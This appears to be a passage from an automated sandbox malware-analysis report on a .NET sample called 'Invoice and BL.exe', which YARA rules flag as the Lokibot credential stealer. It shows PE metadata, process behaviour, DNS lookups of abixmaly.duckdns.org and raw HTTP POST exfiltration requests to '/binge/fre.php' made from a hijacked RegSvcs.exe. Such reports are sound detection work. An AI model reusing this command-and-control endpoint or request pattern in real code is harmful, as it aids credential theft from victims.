                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x82d300x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x5f0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x80d880x80e00False0.661054194956data7.07527531972IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x840000x5f00x600False0.434244791667data4.23356085492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x840900x360data
                                RT_MANIFEST0x844000x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightCopyright Thomas ICHE 2011
                                Assembly Version1.0.0.0
                                InternalNamesH7BDA6.exe
                                FileVersion1.0.0.0
                                CompanyNameThomas ICHE
                                LegalTrademarks
                                Comments
                                ProductNameNodeGraph Control
                                ProductVersion1.0.0.0
                                FileDescriptionNodeGraph Control
                                OriginalFilenamesH7BDA6.exe

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 3, 2021 23:25:48.240401983 CEST4973580192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:48.546915054 CEST8049735192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:48.547018051 CEST4973580192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:48.549781084 CEST4973580192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:48.989089012 CEST8049735192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:49.217688084 CEST4973680192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:49.590460062 CEST8049736192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:49.590812922 CEST4973680192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:49.594585896 CEST4973680192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:50.064380884 CEST8049736192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:50.286206007 CEST4973780192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:50.621546030 CEST8049737192.169.69.26192.168.2.3
                                Aug 3, 2021 23:25:50.621686935 CEST4973780192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:50.624500036 CEST4973780192.168.2.3192.169.69.26
                                Aug 3, 2021 23:25:51.116770983 CEST8049737192.169.69.26192.168.2.3

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 3, 2021 23:25:01.965200901 CEST5598453192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:01.990057945 CEST53559848.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:02.812500000 CEST6418553192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:02.838824987 CEST53641858.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:03.623450041 CEST6511053192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:03.655958891 CEST53651108.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:04.799285889 CEST5836153192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:04.824037075 CEST53583618.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:05.609446049 CEST6349253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:05.635703087 CEST53634928.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:06.394115925 CEST6083153192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:06.426983118 CEST53608318.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:07.545547962 CEST6010053192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:07.570559978 CEST53601008.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:08.219691992 CEST5319553192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:08.252476931 CEST53531958.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:09.019900084 CEST5014153192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:09.055320978 CEST53501418.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:11.024949074 CEST5302353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:11.052884102 CEST53530238.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:11.832559109 CEST4956353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:11.860027075 CEST53495638.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:12.767927885 CEST5135253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:12.804932117 CEST53513528.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:13.611267090 CEST5934953192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:13.646742105 CEST53593498.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:14.420315027 CEST5708453192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:14.454694033 CEST53570848.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:15.235562086 CEST5882353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:15.270891905 CEST53588238.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:15.931452036 CEST5756853192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:15.959507942 CEST53575688.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:17.930167913 CEST5054053192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:17.958234072 CEST53505408.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:32.462038040 CEST5436653192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:32.502648115 CEST53543668.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:36.951637030 CEST5303453192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:36.992911100 CEST53530348.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:47.089174032 CEST5776253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:47.133114100 CEST53577628.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:48.091098070 CEST5543553192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:48.221827030 CEST53554358.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:49.182408094 CEST5071353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:49.215876102 CEST53507138.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:50.152689934 CEST5613253192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:50.283862114 CEST53561328.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:54.193939924 CEST5898753192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:54.226804018 CEST53589878.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:56.135874987 CEST5657953192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:56.182151079 CEST53565798.8.8.8192.168.2.3
                                Aug 3, 2021 23:25:58.320705891 CEST6063353192.168.2.38.8.8.8
                                Aug 3, 2021 23:25:58.361673117 CEST53606338.8.8.8192.168.2.3
                                Aug 3, 2021 23:26:00.458633900 CEST6129253192.168.2.38.8.8.8
                                Aug 3, 2021 23:26:00.492656946 CEST53612928.8.8.8192.168.2.3
                                Aug 3, 2021 23:26:37.320955992 CEST6361953192.168.2.38.8.8.8
                                Aug 3, 2021 23:26:37.372351885 CEST53636198.8.8.8192.168.2.3
                                Aug 3, 2021 23:26:38.905750036 CEST6493853192.168.2.38.8.8.8
                                Aug 3, 2021 23:26:38.948692083 CEST53649388.8.8.8192.168.2.3

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Aug 3, 2021 23:25:48.091098070 CEST192.168.2.38.8.8.80x848aStandard query (0)abixmaly.duckdns.orgA (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:49.182408094 CEST192.168.2.38.8.8.80xa9e8Standard query (0)abixmaly.duckdns.orgA (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:50.152689934 CEST192.168.2.38.8.8.80x7bffStandard query (0)abixmaly.duckdns.orgA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Aug 3, 2021 23:25:48.221827030 CEST8.8.8.8192.168.2.30x848aNo error (0)abixmaly.duckdns.org192.169.69.26A (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:49.215876102 CEST8.8.8.8192.168.2.30xa9e8No error (0)abixmaly.duckdns.org192.169.69.26A (IP address)IN (0x0001)
                                Aug 3, 2021 23:25:50.283862114 CEST8.8.8.8192.168.2.30x7bffNo error (0)abixmaly.duckdns.org192.169.69.26A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • abixmaly.duckdns.org

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.349735192.169.69.2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                TimestampkBytes transferredDirectionData
                                Aug 3, 2021 23:25:48.549781084 CEST1329OUTPOST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.349736192.169.69.2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                TimestampkBytes transferredDirectionData
                                Aug 3, 2021 23:25:49.594585896 CEST1336OUTPOST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 190
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.349737192.169.69.2680C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                TimestampkBytes transferredDirectionData
                                Aug 3, 2021 23:25:50.624500036 CEST1337OUTPOST /binge/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: abixmaly.duckdns.org
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: D82FEB54
                                Content-Length: 163
                                Connection: close


                                Code Manipulations

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: Invoice and BL.exe PID: 1152 Parent PID: 5556

                                General

                                Start time:23:25:05
                                Start date:03/08/2021
                                Path:C:\Users\user\Desktop\Invoice and BL.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Invoice and BL.exe'
                                Imagebase:0x370000
                                File size:530432 bytes
                                MD5 hash:3C7B342067F6142E6ED45551F5F60C50
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Analysis Process: RegSvcs.exe PID: 5412 Parent PID: 1152

                                General

                                Start time:23:25:45
                                Start date:03/08/2021
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:{path}
                                Imagebase:0x830000
                                File size:45152 bytes
                                MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Loki_1, Description: Loki Payload, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Disassembly

                                Code Analysis

                                Reset < >